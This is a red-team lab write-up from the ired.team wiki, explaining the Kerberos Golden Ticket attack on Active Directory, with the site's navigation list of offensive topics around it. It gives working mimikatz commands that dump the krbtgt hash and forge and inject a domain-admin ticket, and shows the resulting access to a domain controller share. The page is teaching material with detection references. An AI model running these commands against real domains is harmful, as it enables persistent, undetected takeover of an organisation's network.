Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Takeover
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
Active Directory Lab with Hyper-V and PowerShell
ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain Controller Machine Certificate
From Misconfigured Certificate Template to Domain Admin
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Kerberos: Golden Tickets
Persistence and Privilege Escalation with Golden Kerberots tickets
This lab explores an attack on Active Directory Kerberos Authentication. To be more precise - an attack that forges Kerberos Ticket Granting Tickets (TGT) that are used to authenticate users with Kerberos. TGTs are used when requesting Ticket Granting Service (TGS) tickets, which means a forged TGT can get us any TGS ticket - hence it's golden.
This attack assumes a Domain Controller compromise where KRBTGT account hash will be extracted which is a requirement for a successful Golden Ticket attack.

Execution

Extracting the krbtgt account's password NTLM hash:
[email protected]
1
mimikatz # lsadump::lsa /inject /name:krbtgt
Copied!
Creating a forged golden ticket that automatically gets injected in current logon session's memory:
[email protected]
1
mimikatz # kerberos::golden /domain:offense.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt
Copied!
Checking if the ticket got created:
Opening another powershell console with low privileged account and trying to mount a c$ share of pc-mantvydas and dc-mantvydas - not surprisingly, returns access denied:
However, switching back to the console the attacker used to create the golden ticket (local admin) and again attempting to access c$ share of the domain controller - this time is a success:

Observations

References

Complete Domain Compromise with Golden Tickets
Stealthbits Technologies
Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
Active Directory Security
Previous
Kerberoasting
Next
Kerberos: Silver Tickets
Last modified 3yr ago
Copy link
Contents
Execution
Observations
References